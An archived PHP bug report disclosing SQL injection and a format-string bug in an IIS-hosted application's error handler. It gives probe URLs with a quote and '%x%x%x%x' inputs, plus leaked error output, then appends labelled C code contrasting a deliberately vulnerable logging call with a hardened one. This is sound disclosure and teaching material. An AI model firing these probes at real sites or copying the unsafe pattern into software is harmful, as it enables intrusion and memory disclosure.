From: [EMAIL PROTECTED]
Operating system: Win2k
PHP version: 4.2.3
PHP Bug Type: IIS related
Bug description: Remote Format String Bug

During a Pentest, I was searching for SQL injection, and noticed that PHP returned the following error:

http://www.victim.com/cgi-bin/ecust.cfg/php.exe/enduser/std_adp.php?p_admin=1&p_faqid=510'

    Internal Error
    --------------------------------------------------------------------------------
    File: odbc2.c
    Line: 211
    In Fcn.: sql_prepare
    Called Fcn.: SQLPrepare() returned -1
    Description:
    42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ')'.
    42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Line 7: Incorrect syntax near ')'.
    42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Statement(s) could not be prepared.
    SQL STMT: select f.faq_id, f.faq_group_id, f.lang_id, f.title, f.description, f.solution, f.created, f.updated, l1.label, l2.label from faqs f left outer join labels l1 on (f.access_id = l1.label_id) and (11 = l1.tbl) and (f.lang_id = l1.lang_id) left outer join labels l2 on (f.status = l2.label_id) and (19 = l2.tbl) and (f.lang_id = l2.lang_id) ,statuses s where (f.status = s.code) and (s.type_id = 4) and (f.access_id in (1, 2)) and (f.faq_id = 510')

This indicates SQL injection. By entering

http://www.victim.com/cgi-bin/ecust.cfg/php.exe/enduser/std_adp.php?p_admin=1&p_faqid=510'A

you will notice that the returned error message shows the 'A:

    Internal Error
    --------------------------------------------------------------------------------
    File: odbc2.c
    Line: 211
    In Fcn.: sql_prepare
    Called Fcn.: SQLPrepare() returned -1
    Description:
    42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string 'A)'.
    42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Line 7: Incorrect syntax near 'A)'.
    42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Statement(s) could not be prepared.
    SQL STMT: select f.faq_id, f.faq_group_id, f.lang_id, f.title, f.description, f.solution, f.created, f.updated, l1.label, l2.label from faqs f left outer join labels l1 on (f.access_id = l1.label_id) and (11 = l1.tbl) and (f.lang_id = l1.lang_id) left outer join labels l2 on (f.status = l2.label_id) and (19 = l2.tbl) and (f.lang_id = l2.lang_id) ,statuses s where (f.status = s.code) and (s.type_id = 4) and (f.access_id in (1, 2)) and (f.faq_id = 510'A)

To test for the possibility of a Format String I entered the following:

http://victim.com/cgi-bin/ecust.cfg/php.exe/enduser/std_adp.php?p_admin=1&p_faqid=510'%x%x%x%x

You will note from the error logs that a format string bug is present in four different fields:

    Internal Error
    --------------------------------------------------------------------------------
    File: odbc2.c
    Line: 211
    In Fcn.: sql_prepare
    Called Fcn.: SQLPrepare() returned -1
    Description:
    42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '51275075127680)'.
    42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Line 7: Incorrect syntax near '10081b6e0ffffffffdf1eb0)'.
    42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Statement(s) could not be prepared.
    SQL STMT: select f.faq_id, f.faq_group_id, f.lang_id, f.title, f.description, f.solution, f.created, f.updated, l1.label, l2.label from faqs f left outer join labels l1 on (f.access_id = l1.label_id) and (11 = l1.tbl) and (f.lang_id = l1.lang_id) left outer join labels l2 on (f.status = l2.label_id) and (19 = l2.tbl) and (f.lang_id = l2.lang_id) ,statuses s where (f.status = s.code) and (s.type_id = 4) and (f.access_id in (1, 2)) and (f.faq_id = 510'12fbe8cf7124b4a018b46030)

This format string bug is NOT dependent on there being SQL injection present.
To get the format string you just have to cause an error, for example:

http://www.victim.com/cgi-bin/ecust.cfg/php.exe/enduser/std_adp.php?p_admin=1&p_faqid=510>

This obviously indicates that the Format String is in the Error Handling process.

Regards
Mark Litchfield
www.ngssoftware.com
Tel +44 1241 431367
email: [EMAIL PROTECTED]

-- 
Edit bug report at http://bugs.php.net/?id=20124&edit=1
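Added illustration of the defect the report's output implies; this is not the product's code (the report shows only its error output, not its source). It assumes a hypothetical logging helper, log_error, that takes a caller-chosen format string, and places the untrusted statement in that format slot beside the hardened call, plus a check that tells expanded specifiers from a verbatim echo; the statement text is constructed.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample of the statement tail from the report's third request:
 * the untrusted p_faqid value, "%x%x%x%x" included, has already been spliced
 * into the SQL text that the error handler echoes back. */
static const char SAMPLE_STMT[] =
    "select f.faq_id from faqs f where (f.faq_id = 510'%x%x%x%x)";

/* Hypothetical logging helper of the kind such error handlers use: the
 * caller chooses the format string. (Adding __attribute__((format(printf,
 * 3, 4))) here lets gcc/clang -Wformat-security flag the unsafe caller.) */
static void log_error(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(out, n, fmt, ap);
    va_end(ap);
}

/* Vulnerable pattern: untrusted text occupies the FORMAT slot. Each "%x"
 * reads an argument that was never passed, which is why the report shows
 * "Incorrect syntax near '10081b6e0ffffffffdf1eb0)'" instead of a literal
 * "%x". Undefined behaviour; kept for comparison and never called here. */
static void report_error_unsafe(char *out, size_t n, const char *stmt)
{
    log_error(out, n, stmt);
}

/* Hardened form: constant format, untrusted data only as a %s argument. */
static void report_error_safe(char *out, size_t n, const char *stmt)
{
    log_error(out, n, "SQL STMT: %s", stmt);
}

/* Check for an error message: was the untrusted text echoed byte-for-byte
 * (1) or altered by format processing (0)? Expanded "%x" fails this. */
static int echoed_verbatim(const char *stmt, const char *message)
{
    return strstr(message, stmt) != NULL;
}

int main(void)
{
    char buf[256];
    (void)report_error_unsafe;   /* referenced so the comparison compiles unused */
    report_error_safe(buf, sizeof buf, SAMPLE_STMT);
    printf("%s\nechoed verbatim: %d\n", buf, echoed_verbatim(SAMPLE_STMT, buf));
    return 0;
}
```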